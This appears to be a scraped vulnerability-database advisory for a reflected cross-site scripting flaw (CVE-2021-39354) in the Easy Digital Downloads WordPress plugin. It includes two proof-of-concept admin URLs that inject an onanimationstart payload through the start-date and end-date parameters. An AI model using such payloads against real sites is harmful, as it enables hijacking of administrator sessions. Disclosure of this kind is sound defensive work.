Lucene search
WpvulndbWPEX-ID:21F5823E-0245-4353-8D4D-2F63B8912B40HistoryOct 19, 2021 - 12:00 a.m.
Easy Digital Downloads < 2.11.2.1 - Reflected Cross-Site Scripting
2021-10-1900:00:00
wpvulndb
104
0.001 Low
EPSS
Percentile
26.4%
The plugin does not escape the start-date and end-date parameters in the payment history dashboard before outputting them back in attributes, leading to Reflected Cross-Site Scripting issues
https://example.com/wp-admin/edit.php?post_type=download&page=edd-payment-history&start-date="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//
https://example.com/wp-admin/edit.php?post_type=download&page=edd-payment-history&end-date="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//Related
patchstack
patchstack
prion
prion
Cross site scripting
2021-10-21 20:15:00
cvelist
cvelist
wpvulndb
wpvulndb
Easy Digital Downloads < 2.11.2.1 - Reflected Cross-Site Scripting
2021-10-19 00:00:00
nvd
nvd
CVE-2021-39354
2021-10-21 20:15:08
cnvd
cnvd
WordPress Cross-Site Scripting Vulnerability (CNVD-2021-83668)
2021-10-25 00:00:00
cve
cve
CVE-2021-39354
2021-10-21 20:15:08